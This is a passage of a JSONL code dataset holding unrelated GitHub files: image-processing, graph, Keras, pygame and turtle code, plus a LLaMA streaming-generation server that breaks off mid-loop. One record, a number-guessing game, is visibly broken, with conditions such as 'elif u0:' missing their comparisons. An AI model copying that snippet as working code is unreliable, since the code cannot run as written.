= np.arange(-1, 2).astype(float)\n kernel = - kernel / 2\n\n gradient_x = scipy.ndimage.convolve(gradient_x, kernel[np.newaxis])\n gradient_y = scipy.ndimage.convolve(gradient_y, kernel[np.newaxis].T)\n\n return gradient_x, gradient_y\n\n def Sobel(self, im_smooth):\n \"\"\" Calculates another type of gradient for the normal map. \"\"\"\n gradient_x = im_smooth.astype(float)\n gradient_y = im_smooth.astype(float)\n\n kernel = np.array([[-1, 0, 1], [-2, 0, 2], [-1, 0, 1]])\n\n gradient_x = scipy.ndimage.convolve(gradient_x, kernel)\n gradient_y = scipy.ndimage.convolve(gradient_y, kernel.T)\n\n return gradient_x, gradient_y\n\n def ComputeNormalMap(self, gradient_x, gradient_y, intensity=1):\n \"\"\" Calculates the normals of an image and returns a normal map. \"\"\"\n width = gradient_x.shape[1]\n height = gradient_x.shape[0]\n max_x = np.max(gradient_x)\n max_y = np.max(gradient_y)\n\n max_value = max_x\n\n if max_y > max_x:\n max_value = max_y\n\n normal_map = np.zeros((height, width, 3), dtype=np.float32)\n\n intensity = 1 / intensity\n\n strength = max_value / (max_value * intensity)\n\n normal_map[..., 0] = gradient_x / max_value\n normal_map[..., 1] = gradient_y / max_value\n normal_map[..., 2] = 1 / strength\n\n norm = np.sqrt(np.power(normal_map[..., 0], 2) +\n np.power(normal_map[..., 1], 2) + np.power(normal_map[..., 2], 2))\n\n normal_map[..., 0] /= norm\n normal_map[..., 1] /= norm\n normal_map[..., 2] /= norm\n\n normal_map *= 0.5\n normal_map += 0.5\n\n return normal_map\n\n @property\n def NodeMeta(self):\n meta_info = {\n \"label\": \"To Normal Map\",\n \"author\": \"Correct Syntax\",\n \"version\": (2, 2, 0),\n \"supported_app_version\": (0, 5, 0),\n \"category\": \"CONVERT\",\n \"description\": \"Converts the image into a normal map texture for use in 3D.\",\n }\n return meta_info\n\n def NodeInitProps(self):\n p1 = api.PositiveIntegerProp(\n idname=\"Sigma\",\n default=1,\n min_val=1,\n max_val=25,\n widget=api.SLIDER_WIDGET,\n label=\"Sigma:\",\n )\n p2 = api.PositiveIntegerProp(\n idname=\"Intensity\",\n default=1,\n min_val=1,\n max_val=25,\n widget=api.SLIDER_WIDGET,\n label=\"Intensity:\",\n )\n\n self.NodeAddProp(p1)\n self.NodeAddProp(p2)\n\n def NodeInitParams(self):\n p = api.RenderImageParam('Image')\n\n self.NodeAddParam(p)\n\n def NodeEvaluation(self, eval_info):\n image1 = eval_info.EvaluateParameter('Image')\n sigma_val = eval_info.EvaluateProperty('Sigma')\n intensity_val = eval_info.EvaluateProperty('Intensity')\n\n # Convert the current image data to an array that scipy can use\n im = ArrayFromImage(image1.GetImage())\n\n # Create the image\n if im.ndim == 3:\n im_grey = np.zeros((im.shape[0], im.shape[1])).astype(float)\n im_grey = (im[..., 0] * 0.3 + im[..., 1] * 0.6 + im[..., 2] * 0.1)\n im = im_grey\n\n im_smooth = self.SmoothGaussian(im, sigma_val)\n sobel_x, sobel_y = self.Sobel(im_smooth)\n\n # Calculate the normal map\n generated_normal_map = self.ComputeNormalMap(\n sobel_x,\n sobel_y,\n intensity_val\n )\n\n image = api.RenderImage()\n image.SetAsImage(\n ArrayToImage(generated_normal_map).convert('RGBA')\n )\n self.NodeSetThumb(image.GetImage())\n return image\n\n\napi.RegisterNode(ToNormalMapNode, \"corenode_tonormalmap\")\n","repo_name":"GimelStudio/Gimel-Studio","sub_path":"src/GimelStudio/corenodes/convert/to_normal_map_node.py","file_name":"to_normal_map_node.py","file_ext":"py","file_size_in_byte":4787,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"37"} +{"seq_id":"73332370348","text":"i=0\nf=5\nc=10\nwhile c>0:\n u=int(input(\"enter number\"))\n d=0\n if u==f:\n print(\"your guessing is correct\")\n print(\"congrates\")\n break\n elif u0:\n print(\"remaining chance\",r)\n else:\n print(\"finished\")\n elif f0:\n print(\"remaining chance\",r)\n else:\n print(\"finished\")\n i+=1\nelse:\n print(\"your chance is finished try again\")","repo_name":"gauriindalkar/while-loop","sub_path":"interview guessing game.py","file_name":"interview guessing game.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41427353891","text":"class Solution:\n def kidsWithCandies(self, candies: List[int], extraCandies: int) -> List[bool]:\n tempCandies = candies[:]\n tempCandies.sort(reverse=True)\n highestPossibleCandies = tempCandies[0]\n output = []\n for candy in candies:\n if (candy + extraCandies) >= highestPossibleCandies:\n output.append(True)\n else:\n output.append(False)\n return output","repo_name":"BhavyaShah99/leet-code-hackerrank-practice","sub_path":"greatest-num-candies.py","file_name":"greatest-num-candies.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14429158128","text":"import numpy as np\nimport pygame\n\nfrom visualizer.utilities.utils import SCREEN_DIM\nfrom visualizer.utilities.utils import scaled_value\n\n\nclass Point:\n def __init__(self, trajectory, screen):\n self.trajectory = trajectory\n self.screen = screen\n self.length = 10\n\n def createPoints(self):\n startPoint = self.draw(self.trajectory[0].getX(), -self.trajectory[0].getY())\n endPoint = self.draw(self.trajectory[-1].getX(), -self.trajectory[-1].getY())\n return startPoint, endPoint\n\n def draw(self, x, y):\n point = pygame.draw.circle(self.screen, (255, 0, 0),\n [np.clip((scaled_value(x, isRelative=True)), (-SCREEN_DIM + self.length),\n (SCREEN_DIM - self.length))\n , np.clip(scaled_value(y, isRelative=True), (-SCREEN_DIM + self.length),\n (SCREEN_DIM - self.length))],\n self.length)\n return point\n","repo_name":"amangalampalli/SplineTrajectoryGenerator","sub_path":"visualizer/sprites/point.py","file_name":"point.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27993034061","text":"from polygon import WebSocketClient\nfrom polygon.websocket.models import WebSocketMessage\nfrom typing import List\nimport asyncio\n\nc = WebSocketClient(subscriptions=[\"T.*\"])\n\n\nasync def handle_msg(msgs: List[WebSocketMessage]):\n for m in msgs:\n print(m)\n\n\nasync def timeout():\n await asyncio.sleep(1)\n print(\"unsubscribe_all\")\n c.unsubscribe_all()\n await asyncio.sleep(1)\n print(\"close\")\n await c.close()\n\n\nasync def main():\n await asyncio.gather(c.connect(handle_msg), timeout())\n\n\nasyncio.run(main())\n","repo_name":"polygon-io/client-python","sub_path":"examples/websocket/async.py","file_name":"async.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":597,"dataset":"github-code","pt":"37"} +{"seq_id":"19297226983","text":"import unittest\nimport csv\nfrom challenge2 import sort_csv, sorting_func\n\ndef compare_function(row1, row2):\n\tresult1 = sorting_func(row1)\n\tresult2 = sorting_func(row2)\n\tif result1[0] > result2[0]:\n\t\treturn False\n\tif result1[0] < result2[0]:\n\t\treturn True\n\t#compare year\n\tif result1[1] < result2[1]:\n\t\treturn True\n\tif result1[1] > result2[1]:\n\t\treturn False\n\t# compare month if year is equal\n\tif result1[2] > result2[2]:\n\t\treturn False\n\tif result1[2] < result2[2]:\n\t\treturn True\n\t# compare day if month is equal\n\tif result1[3] > result2[3]:\n\t\treturn False\n\tif result1[3] <= result2[3]:\n\t\treturn True\n\n\n\nclass Challenge2_Test(unittest.TestCase):\n\n\tdef test_sorting_function(self):\n\t\tdata_row1 = [\"1\",\"33\",\"98\",\"25\",\"50\",\"2001-05-18\"]\n\t\tresult1 = (1, 2001, 5, 18)\n\t\tdata_row2 = [\"1\",\"5\",\"26\",\"14\",\"72\",\"1/17/18\"]\n\t\tresult2 = (1, 2018, 1, 17)\n\t\t\n\t\tself.assertEqual(sorting_func(data_row1), result1)\n\t\tself.assertEqual(sorting_func(data_row2), result2)\n\n\tdef test_sorting_large_data(self):\n\t\tsort_csv('large_data.csv', 'large_data_sorted.csv')\n\t\twith open('large_data_sorted.csv', 'r') as csv_file:\n\t\t\tcsv_reader = csv.reader(csv_file, delimiter=',')\n\t\t\tnext(csv_reader)\n\t\t\tprevious_line = next(csv_reader)\n\t\t\tfor line in csv_reader:\n\t\t\t\tcurrent_line = line\n\t\t\t\tresult = compare_function(previous_line, current_line)\n\t\t\t\tself.assertEqual(result, True)\n\t\t\t\tprevious_line = current_line\n\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"poonesh/code-challenge","sub_path":"challenge2/challenge2Test.py","file_name":"challenge2Test.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36069745444","text":"__author__ = \"Michail Xyntarakis\"\n__company__ = \"Parsons Brinckerhoff\"\n__email__ = \"xyntarakis@pbworld.com\"\n__license__ = \"GPL\"\n\nimport logging\nfrom itertools import imap,chain\nfrom math import fabs, atan, atan2, pi, sqrt, acos, sin, cos\nimport random\nimport sys\n\nfrom roadNetwork.edge import Edge\nfrom roadNetwork.errors import GraphError\n\nclass Vertex(object):\n\n def __init__(self, id_, x, y):\n \n self.id = id_\n self.iid = self.id\n self.x = x\n self.y = y \n self._emanatingEdges = []\n self._incidentEdges = []\n self._edgesClockwise = []\n \n def __str__(self):\n\n return \"%s\\t%f\\t%f\" % (self.id, self.x, self.y)\n\n def addOutEdge(self, edge):\n \"\"\"Add the emanating instance of Edge (or subclass) instance to the list \n of emanating links\"\"\"\n\n if not edge.startVertex.id == self.id:\n raise GraphError(\"Edge %s does not start from vertex %s\" % (edge.iid_, self.id))\n\n if edge in self._emanatingEdges:\n raise GraphError(\"Edge %s already emanates from the vertex %s\" % \n (edge.iid_, self.id))\n \n #identify the position to insert the edge\n position = 0\n for i, emanatingEdge in enumerate(self.iterOutEdges()):\n if edge.isClockwise(emanatingEdge):\n position = i + 1\n self._emanatingEdges.insert(position, edge)\n self._edgesClockwise = sorted(chain(self._incidentEdges, \n self._emanatingEdges),\n key = lambda e: self.getOrientation(e.midpoint2))\n\n def addInEdge(self, edge):\n \"\"\"Add the incident instance of Edge (or subclass) to the list\n of incident edges\"\"\"\n \n if not edge.endVertex.id == self.id:\n raise GraphError(\"Edge %s does not end to vertex %s\" % (edge.iid_, self.id))\n\n if edge in self._incidentEdges:\n raise GraphError(\"Edge %s is laready incident to vertex %s\" % \n (edge.iid, self.id))\n\n \n position = 0\n for i, incidentEdge in enumerate(self.iterInEdges()):\n if edge.isCounterClockwise(incidentEdge):\n position = i + 1\n\n self._incidentEdges.insert(position, edge)\n self._edgesClockwise = sorted(chain(self._incidentEdges, \n self._emanatingEdges),\n key = lambda e: self.getOrientation(e.midpoint2))\n\n\n def _sortEdges(self):\n \"\"\"Sorts the edges clockwise\"\"\"\n self._edgesClockwise = sorted(chain(self._incidentEdges, \n self._emanatingEdges),\n key = lambda e: self.getOrientation(e.midpoint2)) \n \n def _deleteOutEdge(self, edge):\n \n #raise Exception(\"Not implemented yet\")\n if edge not in self._emanatingEdges:\n raise GraphError(\"Link %s does not emanate from node %s\" %\n (edge.iid, self.id))\n\n self._emanatingEdges.remove(edge)\n self._sortEdges()\n\n def _deleteInEdge(self, edge):\n\n #raise Exception(\"Not implemented yet\")\n assert isinstance(edge, Edge)\n\n if edge not in self._incidentEdges:\n raise GraphError(\"Edge %s is not incident to node %s\" %\n (edge.iid, self.id))\n \n self._incidentEdges.remove(edge)\n self._sortEdges()\n \n def getCardinality(self):\n\n return (self.getNumOutEdges(),\n self.getNumInEdges())\n \n def getNumOutEdges(self):\n\n return len(self._emanatingEdges)\n\n def getNumInEdges(self):\n\n return len(self._incidentEdges)\n\n def getNumAdjacentEdges(self):\n \n return len(self._emanatingEdges) + len(self._incidentEdges)\n\n def getNumAdjacentVertices(self):\n\n return sum([1 for e in self.iterAdjacentVertices()])\n\n def getNumPredecessorVertices(self):\n\n return self.getNumInEdges()\n\n def getNumSuccessorVertices(self):\n\n return self.getNumOutEdges()\n \n def getOutEdgeClockwise(self, emanatingEdge):\n \n if self.getNumOutEdges() == 0:\n raise GraphError(\"The vertex %s does not have any emanating edges associated with it\" %\n self.id)\n\n if self.getNumOutEdges() == 1:\n raise GraphError(\"The vertex %s has only one emanating edges associated with it\" %\n self.id) \n \n index = self._emanatingEdges.index(emanatingEdge)\n if index == len(self._emanatingEdges) - 1:\n return self._emanatingEdges[0]\n else:\n return self._emanatingEdges[index + 1]\n\n def getInEdgeClockwise(self, edge):\n\n if self.getNumInEdges() == 0:\n raise GraphError(\"The vertex %s does not have any incident edges associated with it\" %\n self.id)\n \n if self.getNumInEdges() == 1:\n raise GraphError(\"The vertex %s has only one incident edge associated with it\" %\n self.id)\n\n index = self._incidentEdges.index(edge)\n if index == 0:\n return self._incidentEdges[-1]\n else:\n return self._incidentEdges[index - 1]\n \n def getInEdgeCounterClockwise(self, edge):\n \n if self.getNumInEdges() == 0:\n raise GraphError(\"The vertex %s does not have any incident edges associated with it\" %\n self.id)\n \n if self.getNumInEdges() == 1:\n raise GraphError(\"The vertex %s has only one incident edge associated with it\" %\n self.id)\n \n index = self._incidentEdges.index(edge)\n \n if index == len(self._incidentEdges) - 1:\n return self._incidentEdges[0]\n else:\n return self._incidentEdges[index + 1]\n \n def getEdgeClockwise(self, edge):\n \"\"\"Get the closest edge either incident or emanating that is\n the first edge to encounter if you are to start walking\n clockwise from this edge\"\"\"\n \n\n # assign mate links to be the pairs of incident/emanating links \n #that have a difference of angle that is less than 5degrees\n\n #now if there is an incident or emanating link without a mate\n #then you should shift it to the left or right. \n \n #now every edge has the left and right edge based on the offset \n \n #how do pick the next link? you just pick the next link with \n #the smallest angle \n #so you need the angle between three points nodeA, self, nodeB\n\n #sort by angle\n #allEdges = sorted(chain(self._incidentEdges, self._emanatingEdges),\n # key = lambda e: self.getOrientation(e.midpoint2))\n\n allEdges = self._edgesClockwise \n index = allEdges.index(edge)\n if index != len(allEdges) - 1:\n return allEdges[index + 1]\n else:\n return allEdges[0]\n \n def getOutEdge(self, vertexId):\n \n for edge in self.iterOutEdges():\n if edge.endVertexId == vertexId:\n return edge\n \n raise GraphError(\"Vertex %s is not connected to vertex %s\" % (self.id ,vertexId))\n\n def getInEdge(self, vertexId):\n \n for edge in self.iterInEdges():\n if edge.startVertexId == vertexId:\n return edge \n raise GraphError(\"Vertex %s is not connected to vertex %s\" % (vertexId, self.id))\n\n def getMovement(self, upVertexId, downVertexId):\n \n iEdge = self.getInEdge(upVertexId)\n mov = iEdge.getOutMovement(downVertexId) \n return mov\n \n def getNumMovements(self):\n \"\"\"Return the number of permitted movements through the intersection\"\"\"\n return sum(imap(lambda mov:1, self.iterMovements()))\n \n def hasOutEdge(self, vertexId):\n\n return vertexId in [edge.endVertex.id for edge in self.iterOutEdges()]\n\n def hasInEdge(self, vertexId):\n\n return vertexId in [edge.startVertexId for edge in self.iterInEdges()]\n\n def hasMovement(self, upVertexId, downVertexId):\n \n for mov in self.iterMovements():\n if mov.startVertexId == upVertexId and mov.vertexCid == downVertexId:\n return True\n return False \n\n def iterMovements(self):\n\n return (mov for iEdge in self.iterInEdges() for mov in iEdge.iterOutMovements()) \n\n def iterEdgesClockwise(self):\n\n return iter(self._edgesClockwise)\n\n def iterEdgePairs(self):\n\n if self.getNumAdjacentEdges() < 2:\n raise GraphError(\"Number of adjacent edges is less than 2\") \n\n if self.getNumAdjacentEdges() == 2:\n yield self._edgesClockwise[0], self._edgesClockwise[1]\n raise StopIteration\n\n eIter = self.iterEdgesClockwise()\n edge1 = eIter.next()\n while True:\n try:\n edge2 = eIter.next() \n yield (edge1, edge2)\n edge1 = edge2 \n\n except StopIteration:\n yield self._edgesClockwise[-1], self._edgesClockwise[0] \n raise StopIteration \n \n def iterOutEdges(self):\n\n return iter(self._emanatingEdges)\n\n def iterInEdges(self):\n\n return iter(self._incidentEdges)\n\n def iterSuccVertices(self):\n\n for edge in self.iterOutEdges():\n yield edge.endVertex\n\n def iterPredVertices(self):\n\n for edge in self.iterInEdges():\n yield edge.startVertex\n\n def iterAdjacentVertices(self):\n \n av = set(self.iterSuccVertices())\n av = av.union(set(self.iterPredVertices()))\n return iter(av)\n \n def iterEdges(self):\n\n return chain(self.iterOutEdges(), self.iterInEdges())\n\n def isJunction(self):\n \n if self.getNumOutEdges() == 1 or self.getNumInEdges() == 1:\n return True\n return False\n\n def isShapePoint(self):\n\n if self.getNumAdjacentEdges() == 4 and self.getNumAdjacentVertices() == 2:\n return True\n if self.getNumAdjacentEdges() == 2 and self.getNumAdjacentVertices() == 2:\n return True\n return False\n\n def isIntersection(self):\n \n return not self.isJunction()\n\n def isIncoming(self, edge):\n\n return True if edge in self._incidentEdges else False\n\n def isOutgoing(self, edge):\n\n return True if edge in self._emanatingEdges else False \n \n def getOrientation(self, point):\n\n x1 = self.x\n y1 = self.y\n x2 = point.x\n y2 = point.y\n\n if x2 > x1 and y2 <= y1: # 2nd quarter\n orientation = atan(fabs(y2-y1)/fabs(x2-x1)) + pi/2\n elif x2 <= x1 and y2 < y1: # 3th quarter\n orientation = atan(fabs(x2-x1)/fabs(y2-y1)) + pi\n elif x2 < x1 and y2 >= y1: # 4nd quarter \n orientation = atan(fabs(y2-y1)/fabs(x2-x1)) + 3 * pi/2\n elif x2 >= x1 and y2 > y1: # 1st quarter\n orientation = atan(fabs(x2-x1)/fabs(y2-y1))\n else:\n orientation = 0.0\n\n return orientation * 180.0 / pi\n\n \n","repo_name":"michalis/pyDTATools","sub_path":"src/roadNetwork/roadNode.py","file_name":"roadNode.py","file_ext":"py","file_size_in_byte":11444,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"25442192982","text":"# Day 19 - Etch a Sketch project\n\nfrom turtle import Turtle, Screen\n\ntim = Turtle()\nscreen = Screen()\nscreen.colormode(255)\ntim.shape('turtle')\ntim.fillcolor('RoyalBlue1')\ntim.pensize(5)\ntim.pencolor((160,32,240))\n\n\ndef move_forwards():\n tim.forward(10)\n \ndef move_backwards():\n tim.backward(10)\n\ndef turn_right():\n tim.right(10)\n \ndef turn_left():\n tim.left(10)\n \ndef clear_drawing():\n tim.clear()\n tim.penup()\n tim.home()\n tim.pendown()\n\ntim.speed('fastest')\nscreen.listen()\nscreen.onkey(key=\"w\", fun=move_forwards)\nscreen.onkey(key=\"s\", fun=move_backwards)\nscreen.onkey(key=\"d\", fun=turn_right)\nscreen.onkey(key=\"a\", fun=turn_left)\nscreen.onkey(key=\"space\", fun=clear_drawing)\nscreen.exitonclick()","repo_name":"Amar1709/100Days_Python","sub_path":"Day_19/etch-a-sketch-start/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38319228359","text":"import tinyparse as m\nimport sys\n\nparser = m.ArgumentParser(\"Repeat a value.\", \"repeat\", sys.argv)\n\nincludeCounter = parser.Flag('include-counter', 'Include a counter with each repetition.')\ncount = parser.Option('count', 'The number of times to repeat a value.', int )\nphrase = parser.Argument('phrase', str, 'The value to repeat.')\n\nif __name__ == '__main__':\n \n if count:\n repeatCounter = count\n else:\n repeatCounter = 5\n \n for i in range(0, repeatCounter): \n if includeCounter:\n print(f\"{i+1}: {phrase}\")\n else:\n print(phrase)","repo_name":"wdxpe/tinyparse","sub_path":"examples/repeat/repeat.py","file_name":"repeat.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18469016338","text":"# -*- coding: utf-8 -*-\n# Date: 2021/04/19\n\n# 互联网电影数据库获取数据集\nfrom keras.datasets import imdb\nimport numpy as np\n\n(train_data, train_label), (test_data, test_label) = imdb.load_data(num_words=10000)\n\n# word_index是一个将单词映射成整数索引的字典\nword_index = imdb.get_word_index()\n\n# 键值颠倒,整数索引映射为单词\nreverse_word_index = dict([(value, key) for (key, value) in word_index.items()])\ndecoded_review = ''.join([reverse_word_index.get(i - 3, '?') for i in train_data[0]])\n\n# 整数序列编码为二进制矩阵\ndef vectoirze_sequences(sequences, dimension=10000):\n results = np.zeros((len(sequences), dimension))\n # enummerate枚举出索引值和对应的值\n for i, sequence in enumerate(sequences):\n results[i, sequence] = 1.0\n return results\n\n\n# 将训练数据和测试数据向量化\nx_train = vectoirze_sequences(train_data)\nx_test = vectoirze_sequences(test_data)\n# 标签向量化\ny_train = np.asarray(train_label).astype('float32')\ny_test = np.asarray(test_label).astype('float32')\n\n# 架构选择:两个中间层,每层都有16个隐藏单元,使用relu作为激活函数,。\n# 第三层输出一个标量,预测当前评论的情感。\n# 最后一层使用sigmod激活输出概率值\n\n# 完成对模型的定义\nfrom keras import models\nfrom keras import layers\n\nmodel = models.Sequential() # 按顺序\nmodel.add(layers.Dense(16, activation='relu', input_shape=(10000,))) # Dense表示一个全连接层\nmodel.add(layers.Dense(16, activation='tanh'))\nmodel.add(layers.Dense(1, activation='sigmoid'))\n\n# 配置优化器\nfrom keras import optimizers\nfrom keras import losses\nfrom keras import metrics\n\n# 模型编译(选择优化器,选择损失函数)\n# model.compile(optimizer='resprop',loss='binary_crossentropy',metrics=['accuracy'])\n# 自定义优化器,损失和指标\nmodel.compile(optimizer=optimizers.RMSprop(lr=0.001), loss=losses.binary_crossentropy,\n metrics=[metrics.binary_accuracy])\n\n# 在训练集中流出样本作为验证集\nx_val = x_train[:10000]\npartial_x_train = x_train[10000:]\ny_val = y_train[:10000]\npartial_y_train = y_train[10000:]\n# 训练模型\nmodel.compile(optimizer='rmsprop', loss='binary_crossentropy', metrics=['acc'])\nhistory = model.fit(partial_x_train, partial_y_train, epochs=20, batch_size=512, validation_data=(x_val, y_val))\n\nimport matplotlib.pyplot as plt\n\nhistory_dict = history.history\n# 验证损失和训练损失\nloss_values = history_dict['loss']\nval_loss_values = history_dict['val_loss']\nepochs = range(1, len(loss_values) + 1)\n# 设置x轴数据,y轴数据,曲线格式,设置图例名称\nplt.plot(epochs, loss_values, 'bo', label='Training loss')\nplt.plot(epochs, val_loss_values, 'b', label='Validation loss')\n# 设置标题\nplt.title('Training and Validation loss')\n# 设置横纵坐标名称\nplt.xlabel('Epochs')\nplt.ylabel('loss')\n# 显示图例\nplt.legend()\nplt.show()\n\nacc = history_dict['acc']\nval_acc = history_dict['val_acc']\n\nplt.plot(epochs, acc, 'bo', label='Training acc')\nplt.plot(epochs, val_acc, 'b', label='Validation acc')\nplt.title('Training and validation accuracy')\nplt.xlabel('Epochs')\nplt.ylabel('Accuracy')\nplt.legend()\nplt.show()\n\n# 重新训练模型\nmodel = models.Sequential()\nmodel.add(layers.Dense(16, activation='relu', input_shape=(10000,)))\nmodel.add(layers.Dense(16, activation='relu'))\nmodel.add(layers.Dense(1, activation='sigmoid'))\nmodel.compile(optimizer='rmsprop', loss='binary_crossentropy', metrics=['accuracy'])\nmodel.fit(x_train, y_train, epochs=4, batch_size=512)\n\n# 修改处:1修改隐藏层层数,2修改隐藏单元,3使用mse替代binary_crossentropy, 4使用tanh激活函数替代relu\n# 原始数据预处理,化为张量转换到神经网络中\n# 二分类问题的sigmod标量输出,使用binary_crossentropy损失函数。\n# rmsprop优化器通常都是不错的选择\n# 过拟合会导致数据效果越来越差\nresults = model.evaluate(x_test, y_test)\n","repo_name":"yang-12345678/Keras","sub_path":"01 二分类问题.py","file_name":"01 二分类问题.py","file_ext":"py","file_size_in_byte":4000,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15540262699","text":"import torch\nimport requests\nimport json\nimport datetime\nimport time\nimport os\n\nimport pdb\nimport re\nimport copy\nimport warnings\n\nfrom typing import Optional, List, Callable, Tuple\nfrom fastchat.model.model_chatglm import InvalidScoreLogitsProcessor\nfrom flask import Flask, request, jsonify, Response, stream_with_context\n\nos.environ['CUDA_VISIBLE_DEVICES'] = '3,5'\n\nhost = '10.176.40.138'\nport = 23496\n\noverall_instruction = \"你是复旦大学知识工场实验室训练出来的语言模型CuteGPT。给定任务描述,请给出对应请求的回答。\\n\"\n\n# model_name = \"/mnt/data122/datasets/LLaMA/llama_13b_112_sft_v1_16bit\"\nmodel_name = \"/data/heqianyu/big_model/instruction_tuning_github/ckp/llama_13b_112_sft_v1\"\n# LORA_WEIGHTS = \"/data/heqianyu/big_model/instruction/ckp/bloom-alpaca-ch-10w_500\"\n# LORA_WEIGHTS = \"/data/heqianyu/big_model/instruction_tuning_github/ckp/llama_lora_623v1/llama_lora_623v1_epoch3\"\n# LORA_WEIGHTS = \"/data/heqianyu/big_model/instruction_tuning_github/ckp/llama_lora_615v1_epoch2\"\n\n\nimport torch.nn as nn\nfrom peft import PeftModel\n\nfrom transformers import AutoModelWithLMHead, AutoTokenizer, GenerationConfig, AutoModelForCausalLM, \\\n StoppingCriteriaList\nfrom transformers.generation.utils import LogitsProcessorList, logger\nfrom transformers.generation.logits_process import NoBadWordsLogitsProcessor\nfrom transformers import AutoModelWithLMHead, T5Tokenizer, AutoTokenizer, LlamaForCausalLM, LlamaTokenizer\n\n\n# chatglm-6bmodel/modeling_chatglm.py\n@torch.no_grad()\ndef stream_chat(self, tokenizer, query: str, history: List[Tuple[str, str]] = None, max_length: int = 2048,\n do_sample=True, top_p=0.7, temperature=0.95, logits_processor=None, **kwargs):\n if history is None:\n history = []\n if logits_processor is None:\n logits_processor = LogitsProcessorList()\n logits_processor.append(InvalidScoreLogitsProcessor())\n gen_kwargs = {\"max_length\": max_length, \"do_sample\": do_sample, \"top_p\": top_p,\n \"temperature\": temperature, \"logits_processor\": logits_processor, **kwargs}\n if not history:\n prompt = query\n else:\n prompt = \"\"\n for i, (old_query, response) in enumerate(history):\n prompt += \"[Round {}]\\n问:{}\\n答:{}\\n\".format(i, old_query, response)\n prompt += \"[Round {}]\\n问:{}\\n答:\".format(len(history), query)\n inputs = tokenizer([prompt], return_tensors=\"pt\")\n inputs = inputs.to(self.device)\n for outputs in self.stream_generate(**inputs, **gen_kwargs):\n outputs = outputs.tolist()[0][len(inputs[\"input_ids\"][0]):]\n response = tokenizer.decode(outputs)\n response = self.process_response(response)\n new_history = history + [(query, response)]\n yield response, new_history\n\n\n@torch.no_grad()\ndef stream_generate(\n self,\n input_ids,\n generation_config: Optional[GenerationConfig] = None,\n logits_processor: Optional[LogitsProcessorList] = None,\n stopping_criteria: Optional[StoppingCriteriaList] = None,\n prefix_allowed_tokens_fn: Optional[Callable[[int, torch.Tensor], List[int]]] = None,\n **kwargs,\n):\n batch_size, input_ids_seq_length = input_ids.shape[0], input_ids.shape[-1]\n\n if generation_config is None:\n generation_config = self.generation_config\n generation_config = copy.deepcopy(generation_config)\n model_kwargs = generation_config.update(**kwargs)\n bos_token_id, eos_token_id = generation_config.bos_token_id, generation_config.eos_token_id\n\n if isinstance(eos_token_id, int):\n eos_token_id = [eos_token_id]\n\n has_default_max_length = kwargs.get(\"max_length\") is None and generation_config.max_length is not None\n if has_default_max_length and generation_config.max_new_tokens is None:\n warnings.warn(\n f\"Using `max_length`'s default ({generation_config.max_length}) to control the generation length. \"\n \"This behaviour is deprecated and will be removed from the config in v5 of Transformers -- we\"\n \" recommend using `max_new_tokens` to control the maximum length of the generation.\",\n UserWarning,\n )\n elif generation_config.max_new_tokens is not None:\n generation_config.max_length = generation_config.max_new_tokens + input_ids_seq_length\n if not has_default_max_length:\n logger.warn(\n f\"Both `max_new_tokens` (={generation_config.max_new_tokens}) and `max_length`(=\"\n f\"{generation_config.max_length}) seem to have been set. `max_new_tokens` will take precedence. \"\n \"Please refer to the documentation for more information. \"\n \"(https://huggingface.co/docs/transformers/main/en/main_classes/text_generation)\",\n UserWarning,\n )\n\n if input_ids_seq_length >= generation_config.max_length:\n input_ids_string = \"decoder_input_ids\" if self.config.is_encoder_decoder else \"input_ids\"\n logger.warning(\n f\"Input length of {input_ids_string} is {input_ids_seq_length}, but `max_length` is set to\"\n f\" {generation_config.max_length}. This can lead to unexpected behavior. You should consider\"\n \" increasing `max_new_tokens`.\"\n )\n\n # 2. Set generation parameters if not already defined\n logits_processor = logits_processor if logits_processor is not None else LogitsProcessorList()\n stopping_criteria = stopping_criteria if stopping_criteria is not None else StoppingCriteriaList()\n\n logits_processor = self._get_logits_processor(\n generation_config=generation_config,\n input_ids_seq_length=input_ids_seq_length,\n encoder_input_ids=input_ids,\n prefix_allowed_tokens_fn=prefix_allowed_tokens_fn,\n logits_processor=logits_processor,\n )\n\n stopping_criteria = self._get_stopping_criteria(\n generation_config=generation_config, stopping_criteria=stopping_criteria\n )\n logits_warper = self._get_logits_warper(generation_config)\n\n unfinished_sequences = input_ids.new(input_ids.shape[0]).fill_(1)\n scores = None\n while True:\n model_inputs = self.prepare_inputs_for_generation(input_ids, **model_kwargs)\n # forward pass to get next token\n outputs = self(\n **model_inputs,\n return_dict=True,\n output_attentions=False,\n output_hidden_states=False,\n )\n\n next_token_logits = outputs.logits[:, -1, :]\n\n # pre-process distribution\n next_token_scores = logits_processor(input_ids, next_token_logits)\n next_token_scores = logits_warper(input_ids, next_token_scores)\n\n # sample\n probs = nn.functional.softmax(next_token_scores, dim=-1)\n if generation_config.do_sample:\n next_tokens = torch.multinomial(probs, num_samples=1).squeeze(1)\n else:\n next_tokens = torch.argmax(probs, dim=-1)\n\n # update generated ids, model inputs, and length for next step\n input_ids = torch.cat([input_ids, next_tokens[:, None]], dim=-1)\n model_kwargs = self._update_model_kwargs_for_generation(\n outputs, model_kwargs, is_encoder_decoder=self.config.is_encoder_decoder\n )\n unfinished_sequences = unfinished_sequences.mul((sum(next_tokens != i for i in eos_token_id)).long())\n\n # stop when each sentence is finished, or if we exceed the maximum length\n if 